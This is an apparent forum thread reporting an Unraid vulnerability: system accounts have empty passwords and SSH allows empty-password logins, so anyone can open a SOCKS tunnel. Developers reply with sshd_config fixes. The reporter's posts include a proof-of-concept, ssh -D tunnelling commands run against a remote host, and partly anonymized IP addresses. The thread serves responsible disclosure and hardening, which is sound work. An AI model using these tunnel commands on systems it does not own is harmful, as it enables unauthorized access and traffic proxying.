Mihai Posted June 20, 2020 Posted June 20, 2020 Hello guys,  I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.  Upon looking at some logs I noticed: ```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```  Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords. While they can't actually execute commands on the system, they can see information about the system: ``` $ ssh unraid -l news Linux 4.19.107-Unraid. Could not chdir to home directory /usr/lib/news: No such file or directory Connection to unraid closed. $ ```  But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.  ``` $ ssh -D 3129 -f -C -q -N lp@unraid $ netstat -plan | grep 3129 tcp       0     0 127.0.0.1:3129         0.0.0.0:*              LISTEN     1658854/ssh   ``` Voila! then you have an ssh tunnel opened. For now I patched my box, but of course it won't survive the reboot.  An easy fix would be: `sed -i -e 's/::1/:!!:1/g' /etc/shadow`  Cheerio, Mihai  1 Quote
Mihai Posted June 20, 2020 Author Posted June 20, 2020 Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind ) ``` [root@taicasimaica ~]# curl -ks4 showip.net 124.122.71.51 [root@taicasimaica ~]# ssh -D 3129 -f -C -q -N [email protected] -p 7127 The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established. ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes [root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129 [root@taicasimaica ~]# curl -ks4 showip.net 91.82.91.172 [root@taicasimaica ~]# ``` 1 Quote
BRiT Posted June 21, 2020 Posted June 21, 2020 Did you send any PM or email to @limetech or @jonp or @eschultz first? Quote
bonienl Posted June 21, 2020 Posted June 21, 2020 Thanks for reporting, I have made an internal report for follow-up. Quote
limetech Posted June 21, 2020 Posted June 21, 2020 21 hours ago, Mihai said: An easy fix would be: Would it be better to change this line in /etc/ssh/sshd_config PermitEmptyPasswords yes to PermitEmptyPasswords no  Quote
limetech Posted June 21, 2020 Posted June 21, 2020 Or.. how about if we add this to sshd_config: AllowTcpForwarding no Match Group root AllowTcpForwarding yes Then only 'root' user can set up forwarding. Quote
Mihai Posted June 21, 2020 Author Posted June 21, 2020 I would use these sshd configurations + setting the users disabled. I don't think having users with empty passwords is a good idea. Thanks for the fast reply! 1 1 Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.